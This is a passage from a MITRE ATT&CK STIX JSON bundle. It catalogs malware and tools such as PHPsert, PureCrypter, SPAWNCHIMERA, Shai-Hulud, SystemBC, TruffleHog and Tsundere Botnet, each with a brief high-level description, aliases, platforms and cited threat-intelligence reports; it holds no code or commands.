                            "description": "John Wolfram, Josh Murchie, Matt Lin, Daniel Ainsworth, Robert Wallace, Dimiter Andonov, Dhanesh Kizhakkinan, Jacob Thompson. (2025, January 8). Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation. Retrieved April 14, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "PHASEJAM"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dragos Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Network Devices"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--9491a623-5861-4d0a-9958-8c05d0d17442",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-19 19:03:14+00:00",
                    "modified": "2026-04-23 23:57:49.687000+00:00",
                    "name": "PHPsert",
                    "description": "[PHPsert](https://attack.mitre.org/software/S9028) is a webshell used to execute PHP code that has been in use since at least 2023 against targets in Japan, Singapore, Peru, Taiwan, Iran, Republic of Korea, and the Philippines. [PHPsert](https://attack.mitre.org/software/S9028) is not typically deployed as a standalone but integrated into web content such as text editors and content management systems.(Citation: sentinelone operationDigitalEye Dec 2024)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9028",
                            "external_id": "S9028"
                        },
                        {
                            "source_name": "sentinelone operationDigitalEye Dec 2024",
                            "description": "Aleksandar Milenkoski, Luigi Martire. (2024, December 10). Operation Digital Eye | Chinese APT Compromises Critical Digital Infrastructure via Visual Studio Code Tunnels. Retrieved February 27, 2025.",
                            "url": "https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "PHPsert"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--6f22487c-dbbf-4a5b-85ca-a8c85e8f2f80",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 22:06:18.120000+00:00",
                    "modified": "2026-04-23 03:35:11.899000+00:00",
                    "name": "PureCrypter",
                    "description": "PureCrypter is a fully-featured malware loader, developed by a threat actor called \u201cPureCoder,\" that has been in use since at least 2021 to distribute a variety of remote access trojans and information stealers.(Citation: Zscaler PureCrypter JUN 2022)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9019",
                            "external_id": "S9019"
                        },
                        {
                            "source_name": "Zscaler PureCrypter JUN 2022",
                            "description": "Dumont, R. (2022, June 13). Technical Analysis of PureCrypter: A Fully-Functional Loader Distributing Remote Access Trojans and Information Stealers. Retrieved April 16, 2026.",
                            "url": "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "PureCrypter"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--251f1715-fc97-4487-b939-5c8823ef7a39",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-17 19:03:01.696000+00:00",
                    "modified": "2026-04-22 20:58:39.745000+00:00",
                    "name": "ROAMINGHOUSE",
                    "description": "[ROAMINGHOUSE](https://attack.mitre.org/software/S9026) is a dropper malware used by [MirrorFace](https://attack.mitre.org/groups/G1054) to extract and execute embedded payloads including [UPPERCUT](https://attack.mitre.org/software/S0275) components.(Citation: Trend Micro Earth Kasha Updates APR 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9026",
                            "external_id": "S9026"
                        },
                        {
                            "source_name": "Trend Micro Earth Kasha Updates APR 2025",
                            "description": "Hiroaki, H. (2025, April 30). Earth Kasha Updates TTPs in Latest Campaign Targeting Taiwan and Japan. Retrieved April 17, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/25/d/earth-kasha-updates-ttps.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "ROAMINGHOUSE"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dominik Breitenbacher, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--50be4e81-db74-41a2-a9aa-423314082bea",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-21 15:00:10.376000+00:00",
                    "modified": "2026-04-23 02:45:33.450000+00:00",
                    "name": "RustyWater",
                    "description": "[RustyWater](https://attack.mitre.org/software/S9037) is\u202fa Rust-based implant used by [MuddyWater](https://attack.mitre.org/groups/G0069). Historically, [MuddyWater](https://attack.mitre.org/groups/G0069) has used PowerShell-based tools and [RustyWater](https://attack.mitre.org/software/S9037) reflects a shift in tooling, demonstrating better techniques for defense evasion and reverse engineering.(Citation: CloudSEK_RustyWater_Jan2026)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9037",
                            "external_id": "S9037"
                        },
                        {
                            "source_name": "Archer RAT / RUSTRIC",
                            "description": "(Citation: CloudSEK_RustyWater_Jan2026)"
                        },
                        {
                            "source_name": "CloudSEK_RustyWater_Jan2026",
                            "description": "Awasthi, P. (2026, January 8). Reborn in Rust: Muddy Water Evolves Tooling with RustyWater Implant. Retrieved March 19, 2026.",
                            "url": "https://www.cloudsek.com/blog/reborn-in-rust-muddywater-evolves-tooling-with-rustywater-implant"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "RustyWater",
                        "Archer RAT / RUSTRIC"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--d1974f35-0e06-478e-bc74-7530545d814b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-17 18:25:01.807000+00:00",
                    "modified": "2026-04-23 02:42:16.476000+00:00",
                    "name": "SPAWNCHIMERA",
                    "description": "[SPAWNCHIMERA](https://attack.mitre.org/software/S9024) is a backdoor that supports command and control and can inject malicious components into native processes.(Citation: CISA SPAWNCHIMERA RESURGE February 2026)(Citation: Google UNC5221 BRICKSTORM SPAWNCHIMERA April 2024)(Citation: JPCERT SPAWNCHIMERA Ivanti February 2025)  [SPAWNCHIMERA](https://attack.mitre.org/software/S9024) It incorporates capabilities from multiple tools within the SPAWN malware family, including SPAWNANT, SPAWNMOLE, and SPAWNSNAIL.(Citation: Google UNC5221 Ivanti January 2025)(Citation: Google UNC5221 BRICKSTORM SPAWNCHIMERA April 2024)(Citation: JPCERT SPAWNCHIMERA Ivanti February 2025)  [SPAWNCHIMERA](https://attack.mitre.org/software/S9024) was first reported in April 2024.(Citation: Google UNC5221 BRICKSTORM SPAWNCHIMERA April 2024) [SPAWNCHIMERA](https://attack.mitre.org/software/S9024) has been observed in activity attributed to People's Republic of China (PRC) state-sponsored threat actors, including UNC5221..(Citation: Google UNC5221 Ivanti January 2025)(Citation: Google UNC5221 Ivanti April 2025)(Citation: Google UNC5221 BRICKSTORM SPAWNCHIMERA April 2024)(Citation: Picus Security UNC5221 Ivanti May 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9024",
                            "external_id": "S9024"
                        },
                        {
                            "source_name": "CISA SPAWNCHIMERA RESURGE February 2026",
                            "description": "DHS/CISA. (2026, February 26). MAR-25993211-r1.v2 Ivanti Connect Secure (RESURGE): AR25-087A. Retrieved April 17, 2026.",
                            "url": "https://www.cisa.gov/news-events/analysis-reports/ar25-087a"
                        },
                        {
                            "source_name": "Google UNC5221 Ivanti January 2025",
                            "description": "John Wolfram, Josh Murchie, Matt Lin, Daniel Ainsworth, Robert Wallace, Dimiter Andonov, Dhanesh Kizhakkinan, Jacob Thompson. (2025, January 8). Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation. Retrieved April 14, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day"
                        },
                        {
                            "source_name": "Google UNC5221 Ivanti April 2025",
                            "description": "John Wolfram, Michael Edie, Jacob Thompson, Matt Lin, Josh Murchie. (2025, April 3). Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457). Retrieved April 13, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability"
                        },
                        {
                            "source_name": "Google UNC5221 BRICKSTORM SPAWNCHIMERA April 2024",
                            "description": "Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph Pisano, Ryan Hall, Ron Craft, Shawn Crew, Billy Wong, Tyler McLellan. (2024, April 4). Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies. Retrieved April 16, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement"
                        },
                        {
                            "source_name": "Picus Security UNC5221 Ivanti May 2025",
                            "description": "Sila Ozeren Hacioglu. (2025, May 5). UNC5221\u2019s Latest Exploit: Weaponizing CVE-2025-22457 in Ivanti Connect Secure. Retrieved April 13, 2026.",
                            "url": "https://www.picussecurity.com/resource/blog/unc5221-cve-2025-22457-ivanti-connect-secure"
                        },
                        {
                            "source_name": "JPCERT SPAWNCHIMERA Ivanti February 2025",
                            "description": "Yuma Masubuchi. (2025, February 20). SPAWNCHIMERA Malware: The Chimera Spawning from Ivanti Connect Secure Vulnerability. Retrieved April 17, 2026.",
                            "url": "https://blogs.jpcert.or.jp/en/2025/02/spawnchimera.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "SPAWNCHIMERA"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Network Devices"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--4e164a21-3fbe-4aaa-be69-2513fdba90f7",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 13:01:30.316000+00:00",
                    "modified": "2026-04-22 00:47:27.191000+00:00",
                    "name": "SameCoin",
                    "description": "[SameCoin](https://attack.mitre.org/software/S9030) is a multi-platform wiper with Windows and Android versions that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) to target entities in the Middle East including in Israel.(Citation: Check Point Wirte NOV 2024)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9030",
                            "external_id": "S9030"
                        },
                        {
                            "source_name": "Check Point Wirte NOV 2024",
                            "description": "Check Point. (2024, November 12). Hamas-affiliated Threat Actor WIRTE Continues its Middle East Operations and Moves to Disruptive Activity. Retrieved April 20, 2026.",
                            "url": "https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "SameCoin"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows",
                        "Android"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--de376fb9-1093-4f59-8d13-aed61042701d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-09 18:24:26.568000+00:00",
                    "modified": "2026-04-24 00:04:27.563000+00:00",
                    "name": "Shai-Hulud",
                    "description": "[Shai-Hulud](https://attack.mitre.org/software/S9008) is a supply chain worm, first reported in September 2025, that spreads through code repositories, including GitHub and NPM packages. It exploits CI/CD pipeline dependencies to propagate to victims and poisons the supply chain by publishing malicious packages. Once inside a victim environment, [Shai-Hulud](https://attack.mitre.org/software/S9008) steals credentials and access tokens from compromised repository accounts and exfiltrates them to attacker-controlled servers via encoded GitHub Actions workflows.(Citation: Palo Alto Unit 42 Shai-Hulud November 2025)(Citation: Microsoft Shai-Hulud December 2025)(Citation: Socket Shai-Hulud November 2025)(Citation: Socket Shai-Hulud Trufflehog September 2025)(Citation: Aikido Shai-Hulud September 2025)(Citation: Netskope Shai-Hulud November 2025)(Citation: Wiz Shai-Hulud September 2025)\n",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9008",
                            "external_id": "S9008"
                        },
                        {
                            "source_name": "Aikido Shai-Hulud September 2025",
                            "description": "Charlie Eriksen. (2025, September 16). S1ngularity/nx attackers strike again. Retrieved April 9, 2026.",
                            "url": "https://www.aikido.dev/blog/s1ngularity-nx-attackers-strike-again"
                        },
                        {
                            "source_name": "Netskope Shai-Hulud November 2025",
                            "description": "Gianpietro Cutolo. (2025, November 26). Shai-Hulud 2.0: Aggressive, Automated, and Fast Spreading. Retrieved April 9, 2026.",
                            "url": "https://www.netskope.com/blog/shai-hulud-2-0-aggressive-automated-one-of-fastest-spreading-npm-supply-chain-attacks-ever-observed"
                        },
                        {
                            "source_name": "Palo Alto Unit 42 Shai-Hulud November 2025",
                            "description": "Justin Moore. (2025, November 25). \"Shai-Hulud\" Worm Compromises npm Ecosystem in Supply Chain Attack (Updated November 26). Retrieved April 9, 2026.",
                            "url": "https://unit42.paloaltonetworks.com/npm-supply-chain-attack/"
                        },
                        {
                            "source_name": "Wiz Shai-Hulud September 2025",
                            "description": "Merav Bar, Rami McCarthy, Barak Sharoni. (2025, September 16). Shai-Hulud: Ongoing Package Supply Chain Worm Delivering Data-Stealing Malware. Retrieved April 9, 2026.",
                            "url": "https://www.wiz.io/blog/shai-hulud-npm-supply-chain-attack"
                        },
                        {
                            "source_name": "Microsoft Shai-Hulud December 2025",
                            "description": "Microsoft Defender Security Team. (n.d.). Shai-Hulud 2.0: Guidance for detecting, investigating, and defending against the supply chain attack. Retrieved April 9, 2026.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2025/12/09/shai-hulud-2-0-guidance-for-detecting-investigating-and-defending-against-the-supply-chain-attack/"
                        },
                        {
                            "source_name": "Socket Shai-Hulud November 2025",
                            "description": "Socket Research Team. (2025, November 24). Shai Hulud Strikes Again (v2). Retrieved April 9, 2026.",
                            "url": "https://socket.dev/blog/shai-hulud-strikes-again-v2"
                        },
                        {
                            "source_name": "Socket Shai-Hulud Trufflehog September 2025",
                            "description": "Socket Research Team. (2025, September 15). Popular Tinycolor npm Package Compromised in Supply Chain Attack Affecting 40+ Packages. Retrieved April 9, 2026.",
                            "url": "https://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Shai-Hulud"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Caio Silva",
                        "Alberto Garcia",
                        "Pedro Rodriguez",
                        "V\u00edctor Alba"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--39643fb9-00c1-4a45-85e5-801a3f2665d1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-12-15 22:33:21.950000+00:00",
                    "modified": "2026-04-23 03:17:29.350000+00:00",
                    "name": "SystemBC",
                    "description": "[SystemBC](https://attack.mitre.org/software/S9001) is a malware family offered as a malware-as-a-service (MaaS) that is used to establish command and control and facilitate follow-on activity, including ransomware deployment.[SystemBC](https://attack.mitre.org/software/S9001) executes a variety of tasks including setting up SOCKS5 proxies, maintaining persistence, ingesting malicious files, and handing C2 communication. [SystemBC](https://attack.mitre.org/software/S9001) was first detected in 2018, and has been used by [Wizard Spider](https://attack.mitre.org/groups/G0102) since at least 2020, and by [FIN7](https://attack.mitre.org/groups/G0046) since at least 2022.(Citation: TrumanKroll_SYSTEMBCServer_Jan2024)(Citation: SophosGnGal_SystemBC_Dec2020)(Citation: BlackBasta)(Citation: AhnLab_SystemBC_Apr2022)(Citation: Lumen_SystemBC_Sept2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9001",
                            "external_id": "S9001"
                        },
                        {
                            "source_name": "Coroxy",
                            "description": "(Citation: BlackBasta)(Citation: Broadcom_SystemBCCoroxy_Nov2023)(Citation: Microsoft_Coroxy_Oct2020)  "
                        },
                        {
                            "source_name": "AhnLab_SystemBC_Apr2022",
                            "description": "AhnLab. (2022, April 4). SystemBC Being Used by Various Attackers . Retrieved June 18, 2025.",
                            "url": "https://asec.ahnlab.com/en/33600/"
                        },
                        {
                            "source_name": "BlackBasta",
                            "description": "Antonio Cocomazzi and Antonio Pirozzi. (2022, November 3). Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor. Retrieved March 14, 2023.",
                            "url": "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/"
                        },
                        {
                            "source_name": "Lumen_SystemBC_Sept2025",
                            "description": "Black Lotus Labs . (2025, September 18). SystemBC: Bringing the noise. Retrieved December 15, 2025.",
                            "url": "https://blog.lumen.com/systembc-bringing-the-noise/"
                        },
                        {
                            "source_name": "Broadcom_SystemBCCoroxy_Nov2023",
                            "description": "Broadcom. (2023, November 17). SystemBC (Coroxy) continuous activities. Retrieved December 15, 2025.",
                            "url": "https://www.broadcom.com/support/security-center/protection-bulletin/systembc-coroxy-continuous-activities"
                        },
                        {
                            "source_name": "SophosGnGal_SystemBC_Dec2020",
                            "description": "Gallagher, S., Gn, S. (2020, December 16). Ransomware operators use SystemBC RAT as off-the-shelf Tor backdoor. Retrieved May 16, 2025.",
                            "url": "https://news.sophos.com/en-us/2020/12/16/systembc/"
                        },
                        {
                            "source_name": "Microsoft_Coroxy_Oct2020",
                            "description": "Microsoft Security Intelligence. (2020, October 30). Backdoor:Win32/Coroxy.A. Retrieved December 15, 2025.",
                            "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Coroxy.A&ThreatID=2147766831"
                        },
                        {
                            "source_name": "TrumanKroll_SYSTEMBCServer_Jan2024",
                            "description": "Truman, D. (2024, January 19). Inside the SYSTEMBC Command-and-Control Server. Retrieved June 18, 2025.",
                            "url": "https://www.kroll.com/en/publications/cyber/inside-the-systembc-malware-server"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "SystemBC",
                        "Coroxy"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Serhii Melnyk",
                        "Stijn Geerts"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--b82b9e25-e37b-4f7c-b1f0-2c2eea4f4be9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 12:48:16.344000+00:00",
                    "modified": "2026-04-23 01:59:00.751000+00:00",
                    "name": "TRAILBLAZE",
                    "description": "[TRAILBLAZE](https://attack.mitre.org/software/S9012) is an in-memory dropper used to deploy the passive backdoor [BRUSHFIRE](https://attack.mitre.org/software/S9011). First reported in March 2025, TRAILBLAZE has been observed in operations attributed to People's Republic of China (PRC) state-sponsored affiliated actors, including UNC5221 and SYLVANITE. (Citation: Dragos SYLVANITE MuddyWater Electrum March 2026)(Citation: Google UNC5221 Ivanti April 2025)(Citation: Picus Security UNC5221 Ivanti May 2025)  ",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9012",
                            "external_id": "S9012"
                        },
                        {
                            "source_name": "Dragos SYLVANITE MuddyWater Electrum March 2026",
                            "description": "Dragos. (2026, March 24). Dragos 2026 OT Cybersecurity Report: Year in Review, O&G and Petrochemicals Focus. Retrieved April 17, 2026.",
                            "url": "https://hub.dragos.com/hubfs/2026_YIR_ExecutiveBriefing%20O_G.pdf?hsLang=en"
                        },
                        {
                            "source_name": "Google UNC5221 Ivanti April 2025",
                            "description": "John Wolfram, Michael Edie, Jacob Thompson, Matt Lin, Josh Murchie. (2025, April 3). Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457). Retrieved April 13, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability"
                        },
                        {
                            "source_name": "Picus Security UNC5221 Ivanti May 2025",
                            "description": "Sila Ozeren Hacioglu. (2025, May 5). UNC5221\u2019s Latest Exploit: Weaponizing CVE-2025-22457 in Ivanti Connect Secure. Retrieved April 13, 2026.",
                            "url": "https://www.picussecurity.com/resource/blog/unc5221-cve-2025-22457-ivanti-connect-secure"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "TRAILBLAZE"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dragos Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Network Devices"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "tool",
                    "id": "tool--76f8a686-3157-481f-9af6-e8558883a8d6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-09 19:12:38.917000+00:00",
                    "modified": "2026-04-23 02:27:35.330000+00:00",
                    "name": "TruffleHog",
                    "description": "[TruffleHog](https://attack.mitre.org/software/S9009) is an open-source secrets-discovery tool that is used to search for credentials, API keys, and encryption keys across a variety of data sources and environments.(Citation: Black Hills Information Security TruffleHog January 2024)(Citation: Github TruffleSecurity Trufflehog April 2025) [TruffleHog](https://attack.mitre.org/software/S9009) has the ability to discover credentials and secrets stored in code repositories, git history, CI/CD pipelines, among other common storage locations to include filesystems and cloud storage buckets.(Citation: Black Hills Information Security TruffleHog January 2024)(Citation: Netskope Shai-Hulud November 2025)(Citation: Github TruffleSecurity Trufflehog April 2025) [TruffleHog](https://attack.mitre.org/software/S9009) was first released by its author in 2016.(Citation: Github TruffleSecurity Trufflehog April 2025)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9009",
                            "external_id": "S9009"
                        },
                        {
                            "source_name": "Black Hills Information Security TruffleHog January 2024",
                            "description": "Chris Traynor. (2024, January 18). Rooting For Secrets with TruffleHog. Retrieved April 15, 2026.",
                            "url": "https://www.blackhillsinfosec.com/rooting-for-secrets-with-trufflehog/"
                        },
                        {
                            "source_name": "Netskope Shai-Hulud November 2025",
                            "description": "Gianpietro Cutolo. (2025, November 26). Shai-Hulud 2.0: Aggressive, Automated, and Fast Spreading. Retrieved April 9, 2026.",
                            "url": "https://www.netskope.com/blog/shai-hulud-2-0-aggressive-automated-one-of-fastest-spreading-npm-supply-chain-attacks-ever-observed"
                        },
                        {
                            "source_name": "Github TruffleSecurity Trufflehog April 2025",
                            "description": "Trufflesecurity. (2026, April 8). TruffleHog Enterprise. Retrieved April 15, 2026.",
                            "url": "https://github.com/trufflesecurity/trufflehog"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "TruffleHog",
                        "Trufflehog"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Linux",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--18f5f8c6-bba5-4aba-93e7-3539fe565883",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 22:24:44.870000+00:00",
                    "modified": "2026-04-23 02:54:33.159000+00:00",
                    "name": "Tsundere Botnet",
                    "description": "[Tsundere Botnet](https://attack.mitre.org/software/S9034) is a botnet first reported in mid-2025 that is delivered via MSI installer or PowerShell script. It leverages Node.js and JavaScript for payload delivery and execution, and uses smart contracts on the blockchain to host command and control (C2) addresses. [Tsundere Botnet](https://attack.mitre.org/software/S9034) is attributed to a likely Russian-speaking threat actor.\n\nA variant named DinDoor has been linked to [MuddyWater](https://attack.mitre.org/groups/G0069) operations and uses the Deno runtime for execution rather than Node.js. (Citation: Checkpoint_MOISCyberCrime_Mar2026)(Citation: SOCRadar_MuddyWaterDindoor_Mar2026)(Citation: CAL_MuddyWater_Mar2026)(Citation: SecureListUbiedo_Tsundere_Nov2025) ",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9034",
                            "external_id": "S9034"
                        },
                        {
                            "source_name": "DinDoor",
                            "description": "(Citation: Checkpoint_MOISCyberCrime_Mar2026)"
                        },
                        {
                            "source_name": "Checkpoint_MOISCyberCrime_Mar2026",
                            "description": "CheckPoint Research. (2026, March 10). Iranian MOIS Actors & the Cyber Crime Connection. Retrieved March 12, 2026.",
                            "url": "https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/"
                        },
                        {
                            "source_name": "CAL_MuddyWater_Mar2026",
